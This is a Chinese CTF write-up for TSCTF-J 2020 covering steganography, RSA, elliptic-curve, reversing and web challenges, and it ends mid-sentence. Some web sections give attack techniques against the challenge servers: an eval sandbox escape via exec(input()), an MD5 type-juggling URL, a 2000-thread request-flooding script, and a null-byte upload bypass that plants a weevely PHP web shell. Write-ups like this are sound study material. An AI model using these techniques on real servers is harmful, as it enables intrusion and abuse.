TSCFT-J 2020 WriteUP
人生中第一次的 CTF (也许?
# TSCTF-J 2020 Kagami WriteUP
# Misc
# 笑里藏刀
解压 xlcd.zip
姐姐喜欢把自己的生日设为密码,而且姐姐可懒了,一般都用4位密码
百度 得到密码 生日月+日四位密码
解压得到16.png
hex查看 得到base64加密的flag
flag:czBfYmVhdVRpZnVsX2dpcjEKCg==
解密提交即可
# Whoami
Jsfuck,去掉末尾括号执行一下
(function anonymous(
) {
alert("flag is TtS_C_T4F_-_Jf{e1NSc_e_?T?h?A}\n欸?好像不太对?")
})
TtS_C_T4F_-_Jf{e1NSc_e_?T?h?A}
类似fence隔一个去掉一个然后放在最后
TSCTF-J{1S__ThA}
TSCTF-J{1S__ThAt__4__feNce???}
# 传世经典
没啥好说的了 就硬拼吧 ps一块一块拼
最后整理wp的时候有个新思路还没来得及实验:pil库检测图片边缘(计算出一个特征值 ?)然后相似的放在一起
# 隐写术知多少
爆破压缩包密码 1234
观察发现是数对x,y且都在290以内
猜想是二维码
from PIL import Image
def replylist(l):
result=[]
with open(l+'.txt','r',encoding="utf-8") as f:
for line in f:
result.append(line.strip('\n'))
return result
res = replylist('flag')
a = []
for x in res:
a.append([int(x.split(',')[0]),int(x.split(',')[1])])
img = Image.new("RGB",(300,300), (255,255,255))
pixTuple = (0,0,0,0)
for ite in a:
img.putpixel((ite[0],ite[1]),pixTuple)
img.save("bb.png")
最后ps一下三个脚脚 扫描得到flag
TSCTF-J{D0_u_L0vE_STeGo?}
# 俄罗斯套娃
本来还想爆破密码的 结果试了俩直接是递增的
写个小py解压
这里的4dict是生成的0000开始的递增字典
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 14 19:39:37 2020
@author: Kagami
"""
import rarfile
import zipfile
import os,random,time
def replylist(l):
result=[]
with open(l+'.txt','r',encoding="utf-8") as f:
for line in f:
result.append(line.strip('\n'))
return result
res = replylist('4dict')
def decode_rar(pwd,orip,p):
try:
fp = rarfile.RarFile(orip)
fp.extractall(path = p,pwd=pwd)
except:
pass
def decode_zip(pwd,orip,p):
try:
fp = zipfile.ZipFile(orip)
fp.extractall(path = p,pwd=pwd.encode())
except:
pass
def file_name(file_dir):
l=[]
for root, dirs, files in os.walk(file_dir):
for x in files:
l.append(x)
return(l)
def ex(lis):
for x in lis:
if 'zip' or 'rar' or 'ZIP' or 'rar' in x:
return False
else:
return True
pd = False
tempath = os.getcwd()+'/ori/'
it = 0
while pd==False:
for x in file_name(tempath):
if x.endswith('zip') or x.endswith('rar'):
ntmpath = os.getcwd()+'/'+str(it)
os.mkdir(ntmpath)
for a in file_name(tempath):
if a.endswith('zip'):
decode_zip(res[it],tempath+'/'+a,ntmpath)
it = it+1
if a.endswith('rar'):
decode_rar(res[it],tempath+'/'+a,ntmpath)
it =it+1
tempath = ntmpath
pd = ex(file_name(ntmpath))
# hide&seek
TweakPNg打开 发现高度被修改
使用py检测出原始宽高
639 597 hex: 0x27f 0x255
用winhex修改得到正确图片 得到前半段flag
用binwalk发现里面还有东西 解出来得到文件夹 在一个文件中发现下列加密文本
a= '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14"><w:body><w:p w14:paraId="5C9B99D5" w14:textId="17CC76B8" w:rsidR="00BA3D22" w:rsidRDefault="00F72ADB" w:rsidP="00BA3D22"><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>佛曰:</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>怯帝怯夢奢曳般怯喝呐不</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>呐能罰倒</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>梵羯</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>缽蒙呐</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>怛哆娑</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>多彌罰他</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>梵</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>呼呐</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>夢</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>至罰舍</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>皤</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>薩</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>娑皤</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>。智諳</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>羯呐心夷怯醯</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>除礙怯</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>參</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>怯殿</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>哆伽特吉者</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>密楞</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>參</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>死倒</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>怛涅奢</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>多</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>哆</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>謹</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>皤</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>神</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>梵</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>穆</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>曳藐</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>怯真缽朋</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>冥醯梵</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>蘇俱恐般</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>數</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>遮喝</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>怖呐多</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>能罰特</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>冥</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>三怯</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>曳</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>利輸上</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>醯</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>俱隸呐諸能缽夷</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>哆</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>等</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>數</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>盧</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>瑟皤夷竟</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>上罰殿諳三</w:t></w:r></w:p><w:p w14:paraId="19F31DCE" w14:textId="77777777" w:rsidR="00F72ADB" w:rsidRDefault="00F72ADB" w:rsidP="00BA3D22"><w:pPr><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr></w:pPr></w:p><w:p w14:paraId="18A78C48" w14:textId="77777777" w:rsidR="00F72ADB" w:rsidRPr="001631A4" w:rsidRDefault="00F72ADB" w:rsidP="00F72ADB"><w:pPr><w:rPr><w:vanish/></w:rPr></w:pPr><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>自由友善法治公正</w:t></w:r></w:p><w:p w14:paraId="7238611B" w14:textId="77777777" w:rsidR="00F72ADB" w:rsidRPr="001631A4" w:rsidRDefault="00F72ADB" w:rsidP="00F72ADB"><w:pPr><w:rPr><w:vanish/></w:rPr></w:pPr><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>平等平等</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>诚信平等</w:t></w:r></w:p><w:p w14:paraId="23105F0C" w14:textId="77777777" w:rsidR="00F72ADB" w:rsidRPr="001631A4" w:rsidRDefault="00F72ADB" w:rsidP="00F72ADB"><w:pPr><w:rPr><w:vanish/></w:rPr></w:pPr><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>和谐民主公正诚信</w:t></w:r></w:p><w:p w14:paraId="19D1E92B" w14:textId="77777777" w:rsidR="00F72ADB" w:rsidRPr="001631A4" w:rsidRDefault="00F72ADB" w:rsidP="00F72ADB"><w:pPr><w:rPr><w:vanish/></w:rPr></w:pPr><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>自由平等诚信平等</w:t></w:r></w:p><w:p w14:paraId="61BC0BB2" w14:textId="77777777" w:rsidR="00F72ADB" w:rsidRPr="001631A4" w:rsidRDefault="00F72ADB" w:rsidP="00F72ADB"><w:pPr><w:rPr><w:vanish/></w:rPr></w:pPr><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>法治自由公正爱国</w:t></w:r></w:p><w:p w14:paraId="1F485354" w14:textId="77777777" w:rsidR="00F72ADB" w:rsidRPr="001631A4" w:rsidRDefault="00F72ADB" w:rsidP="00F72ADB"><w:pPr><w:rPr><w:vanish/></w:rPr></w:pPr><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>和谐和谐</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>平等友善</w:t></w:r></w:p><w:p w14:paraId="15C457E6" w14:textId="77777777" w:rsidR="00F72ADB" w:rsidRPr="001631A4" w:rsidRDefault="00F72ADB" w:rsidP="00F72ADB"><w:pPr><w:rPr><w:vanish/></w:rPr></w:pPr><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>敬业公正自由和谐</w:t></w:r></w:p><w:p w14:paraId="6F8E773B" w14:textId="77777777" w:rsidR="00F72ADB" w:rsidRPr="001631A4" w:rsidRDefault="00F72ADB" w:rsidP="00F72ADB"><w:pPr><w:rPr><w:vanish/></w:rPr></w:pPr><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>文明法治文明公正</w:t></w:r></w:p><w:p w14:paraId="3CE01288" w14:textId="77777777" w:rsidR="00F72ADB" w:rsidRPr="001631A4" w:rsidRDefault="00F72ADB" w:rsidP="00F72ADB"><w:pPr><w:rPr><w:vanish/></w:rPr></w:pPr><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>友善平等法治友善</w:t></w:r></w:p><w:p w14:paraId="60182116" w14:textId="47810D17" w:rsidR="00BA3D22" w:rsidRPr="001631A4" w:rsidRDefault="00F72ADB" w:rsidP="00F72ADB"><w:pPr><w:rPr><w:vanish/></w:rPr></w:pPr><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>法治</w:t></w:r></w:p><w:sectPr w:rsidR="00BA3D22" w:rsidRPr="001631A4"><w:pgSz w:w="11906" w:h="16838"/><w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992" w:gutter="0"/><w:cols w:space="425"/><w:docGrid w:type="lines" w:linePitch="312"/></w:sectPr></w:body></w:document>'''
import re
def find(data,src):
reg = re.compile(src)
rlist = reg.findall(data)
return rlist
c = find(a,'\<w\:t\>(.*?)\<\/w\:t\>')
''.join(c)
Out[11]: '佛曰:怯帝怯夢奢曳般怯喝呐不呐能罰倒梵羯缽蒙呐怛哆娑多彌罰他梵呼呐夢至罰舍皤薩娑皤。智諳羯呐心夷怯醯除礙怯參怯殿哆伽特吉者密楞參死倒怛涅奢多哆謹皤神梵穆曳藐怯真缽朋冥醯梵蘇俱恐般數遮喝怖呐多能罰特冥三怯曳利輸上醯俱隸呐諸能缽夷哆等數盧瑟皤夷竟上罰殿諳三自由友善法治公正平等平等诚信平等和谐民主公正诚信自由平等诚信平等法治自由公正爱国和谐和谐平等友善敬业公正自由和谐文明法治文明公正友善平等法治友善法治'
发现两段加密 与佛论禅和社会主义核心价值观加密
解密 I said there is nothing…… But _U_F1nd_ Me_1n_th3_d2rk}
# 那你能帮帮我吗
这题...是个python的trick 结果我以前从来没用过 最后弄出来个非预期解
exec(input())
print(flag)
用了以上代码构建了一个任意长度的执行
由于观察到源代码
try:
val = 0
inp = input("Input value: ")
count_digits = len(set(inp))
if count_digits <= 10:
val = eval(inp)
有个eval 还检测了10字符以内
于是就构造了一个exec(input())
于是val就变成了 val = eval(exec(input()))
这样就可以执行任意长度的代码了
下列是两种正确(?)解法
#解法一
print(vars())
#解法二
help(flag)
# Crypto
# LordRiot's student
n=2381011181934210877525887658573010292764252520710975398332345697578708886833447259427
e = 65537
c=2257217580308235254675172512515127526716817457982166903087845357172847507580627548946
利用yafu分解
P8 = 30290341
P77=78606285149916631097876635280303060726990578307156575039295387845871688497447
得到p,q
计算 得到flag
# -*- coding: utf-8 -*-
"""
Created on Sat Oct 10 21:17:09 2020
@author: Kagami
"""
import libnum
from Crypto.Util.number import long_to_bytes
c = 2257217580308235254675172512515127526716817457982166903087845357172847507580627548946
n = 2381011181934210877525887658573010292764252520710975398332345697578708886833447259427
e = 65537
q = 30290341
p = 78606285149916631097876635280303060726990578307156575039295387845871688497447
d = libnum.invmod(e, (p - 1) * (q - 1))
m = pow(c, d, n)
string = long_to_bytes(m) #m明文
print(string)
# 三十六天罡+七十二地煞
很简单的的一道题,看到题目名称三十六天罡+七十二地煞 先把人名转换成对应的序号,然后再加上72得到ascii码,最后转换一下就行了
这题必须吐槽一下 出题人把flag在平台里搞错了多加了个空格 导致我怎么看都觉得我的没问题结果就是不对 半夜解出来翻来覆去看了半个多小时这玩意到底哪里有问题看到怀疑人生
songjiang 宋江 1
10jin 史进 23
gongsunsheng 4
qinming 7
5song 14
ruanxiao5 29
ruanxiao2 27
yangxiong 32
10xiu 33
linchong 6
leiheng 25
1 23 4 7 14 29 27 32 33 6 25
73 95 76 79 86 101 99 104 105 78 97
I_LOVechiNa
# 二重唱
电报码加摩斯电码吗
转换一下
1571 4249 2900 0955 2575 4848 0502 1378 1 .--. -.--. .- --..-- -... -.--.- 0639 2422 3634
已知椭圆曲线加密一P(A,B)参数为
.--. -...- 739373920927
P=739373920927
.- -...- -3
A=-3
-... -...- 397352705311
B=397352705311
001 -.--. 391857459775 --..-- 520195089328 -.--.-
001 (391857459775,520195089328)
Gx = 391857459775 Gy = 520195089328
私钥为
-.- -...- 319880
K = 319880
3061 0361 7011 010 -.--. -..- --..-- -.-- -.--.-
求公钥(X,Y)
flag是TSCTF-J{x+y}
解一下
514179734510
478982494818
TSCTF-J{993162229328}
下方是椭圆曲线加密解密的py
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 16 21:59:47 2020
@author: Kagami
"""
import collections
import random
EllipticCurve = collections.namedtuple('EllipticCurve', 'name p a b g n h')
curve = EllipticCurve(
'secp256k1',
# Field characteristic.
p=int(input('p=')),
# Curve coefficients.
a=int(input('a=')),
b=int(input('b=')),
# Base point.
g=(int(input('Gx=')),
int(input('Gy='))),
# Subgroup order.
n=int(input('k=')),
# Subgroup cofactor.
h=1,
)
# Modular arithmetic ##########################################################
def inverse_mod(k, p):
"""Returns the inverse of k modulo p.
This function returns the only integer x such that (x * k) % p == 1.
k must be non-zero and p must be a prime.
"""
if k == 0:
raise ZeroDivisionError('division by zero')
if k < 0:
# k ** -1 = p - (-k) ** -1 (mod p)
return p - inverse_mod(-k, p)
# Extended Euclidean algorithm.
s, old_s = 0, 1
t, old_t = 1, 0
r, old_r = p, k
while r != 0:
quotient = old_r // r
old_r, r = r, old_r - quotient * r
old_s, s = s, old_s - quotient * s
old_t, t = t, old_t - quotient * t
gcd, x, y = old_r, old_s, old_t
assert gcd == 1
assert (k * x) % p == 1
return x % p
# Functions that work on curve points #########################################
def is_on_curve(point):
"""Returns True if the given point lies on the elliptic curve."""
if point is None:
# None represents the point at infinity.
return True
x, y = point
return (y * y - x * x * x - curve.a * x - curve.b) % curve.p == 0
def point_neg(point):
"""Returns -point."""
assert is_on_curve(point)
if point is None:
# -0 = 0
return None
x, y = point
result = (x, -y % curve.p)
assert is_on_curve(result)
return result
def point_add(point1, point2):
"""Returns the result of point1 + point2 according to the group law."""
assert is_on_curve(point1)
assert is_on_curve(point2)
if point1 is None:
# 0 + point2 = point2
return point2
if point2 is None:
# point1 + 0 = point1
return point1
x1, y1 = point1
x2, y2 = point2
if x1 == x2 and y1 != y2:
# point1 + (-point1) = 0
return None
if x1 == x2:
# This is the case point1 == point2.
m = (3 * x1 * x1 + curve.a) * inverse_mod(2 * y1, curve.p)
else:
# This is the case point1 != point2.
m = (y1 - y2) * inverse_mod(x1 - x2, curve.p)
x3 = m * m - x1 - x2
y3 = y1 + m * (x3 - x1)
result = (x3 % curve.p,
-y3 % curve.p)
assert is_on_curve(result)
return result
def scalar_mult(k, point):
"""Returns k * point computed using the double and point_add algorithm."""
assert is_on_curve(point)
if k < 0:
# k * point = -k * (-point)
return scalar_mult(-k, point_neg(point))
result = None
addend = point
while k:
if k & 1:
# Add.
result = point_add(result, addend)
# Double.
addend = point_add(addend, addend)
k >>= 1
assert is_on_curve(result)
return result
# Keypair generation and ECDHE ################################################
def make_keypair():
"""Generates a random private-public key pair."""
private_key = curve.n
public_key = scalar_mult(private_key, curve.g)
return private_key, public_key
private_key, public_key = make_keypair()
print("private key:", hex(private_key))
print("public key: (0x{:x}, 0x{:x})".format(*public_key))
# Re
# EasyXor
逆向签到题(bushi 很简单的一道题 直接ida打开看看就行
n = list=[0 for x in range(0,29)]
n[0] = 62;
n[1] = 58;
n[2] = 41;
n[3] = 57;
n[4] = 44;
n[5] = 84;
n[6] = 54;
n[7] = 28;
n[8] = 58;
n[9] = 99;
n[10] = 34;
n[11] = 60;
n[12] = 98;
n[13] = 9;
n[14] = 20;
n[15] = 56;
n[16] = 78;
n[17] = 31;
n[18] = 32;
n[19] = 52;
n[20] = 74;
n[21] = 13;
n[22] = 27;
n[23] = 48;
n[24] = 37;
n[25] = 36;
n[26] = 29;
n[27] = 97;
n[28] = 101;
decode = "abcdefghijklmnopqrstuvwxyz!!!";
for i in range(0,29):
p = (n[i] - 9) ^ ord(decode[i])
print(chr(p))
# easyASM
头一次看着字节码还原py 很有成就感(x
-*- coding: utf-8 -*-
"""
Created on Tue Oct 13 21:42:39 2020
@author: Kagami
"""
#olis=[169, 154, 191, 182, 144, 234, 159, 177, 217, 236, 138, 160, 128, 154, 166, 138, 216, 137, 190, 202, 190, 183, 171, 158, 148, 175, 137, 254, 146]
def main():
s = input("Guess?\n>> ")
o = b'\xa9\x9a\xbf\xb6\x90\xea\x9f\xb1\xd9\xec\x8a\xa0\x80\x9a\xa6\x8a\xd8\x89\xbe\xca\xbe\xb7\xab\x9e\x94\xaf\x89\xfe\x92'
if e(s) == o:
if b(s):
print('correct')
else:
print('wrong')
def a(i):
return len(i)
def b(i):
if (i[:8]!='TSCTF-J{'):
return False
else:
if i[-1:]!='}':
return False
else:
return True
def c(i):
l = a(i) #len
for j in range(l):
i[j] = (i[j]+128)%256
return bytes(i)[::-1]
def e(f):
o = []
l = a(f) #len(f)
for i in range(l):
w = ord(f[i])^ord(f[(i+4)%l])
o.append(w)
return c(o)
#以下是payload
for x in range(32,127):
if e('TSCTF-J{'+chr(x))[-5]==148:
print(chr(x))
#TSCTF-J{R3aLly_E4sy_4Ss3mblY}
last=''
t = -5
for p in range(0,22):
for x in range(32,127):
if e('TSCTF-J{'+last+chr(x))[t]==olis[t]:
last = last+chr(x)
t = t-1
print(chr(x))
我比较蠢 直接穷举了ascii(因为ascii本来也没多少)
由于最开始的是TSCTF-J{ 末尾是} 根据w = ord(f[i])^ord(f[(i+4)%l])
第i个字符和i+4有关系 直接穷举了然后检测符合不符合原始的那一长串o = b'\xa9\x9a\xbf\xb6\x90\xea\x9f\xb1\xd9\xec\x8a\xa0\x80\x9a\xa6\x8a\xd8\x89\xbe\xca\xbe\xb7\xab\x9e\x94
# WEB
# EasyF12
一道送分题,f12就行了。
确实。
上下左右点不了最后的 删掉disabled
观察到下列代码 发现检测了cookies直接修改跳过检测
修改cookies
在final1.php
构造md5相等payload
http://node.buptmerak.cn:10011/fina1.php?param1=s878926199a¶m2=s155964671a¶m3[]=2¶m4[]=3
# ZBR想要请客
请客!!gkdgkd
没啥好说的 简单的修改cookies
观察到这些
直接修改cookies得到flag
注意:totalSolve 和totalWrong居然是反的??
TSCTF-J{R1ch_Ric1n_ZBR_D1nn3r!}
# 一起顶热评!
硬post(条件竞争也行??)
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 4 22:38:21 2020
@author: Kagami
"""
import urllib
import requests
import json
import os,re,time,random,base64
import threading
import websocket
import requests
import json
from urllib.parse import quote, unquote
from requests.cookies import RequestsCookieJar
import socket
socket.setdefaulttimeout(20)
data = {"subscribe":3979}
u = 'http://node.buptmerak.cn:10026/'
js = 630146
cookie = {
'cookie':"*************"
}
def aki_post(url,aki_json):
request = requests.post(url,cookies=cookie,data=aki_json)
return request
def eee():
global js
a = aki_post(u,data)
if '成功帮顶' in a.text:
print(js)
js = js+1
if js%100==0:
print('+100')
def ww():
for x in range(10000):
try:
eee()
except Exception as e:
raise e
try:
the_list = []
for x in range(2000):
the_list.append(threading.Thread(target=ww))
for things in the_list:
things.start()
except:
print ("Error: 无法启动线程")
while 1:
pass
得到个ascii art 然后f12一下就能看到flag了
# 菜鸡的第一个HTML
得到av号
查看知道歌手
TSCTF-J{nanawoakari}
# EzUpload
发现应该是要用php马
且进行了简单的上传限制与检测eval关键字
上传php马 over.php.jpg
利用burpsuite 修改hex 在十六进制的php和.jpg之间加入00 使其上传后截断
使用weevely生成马并连接
发现flag 利用下面这段打印出来
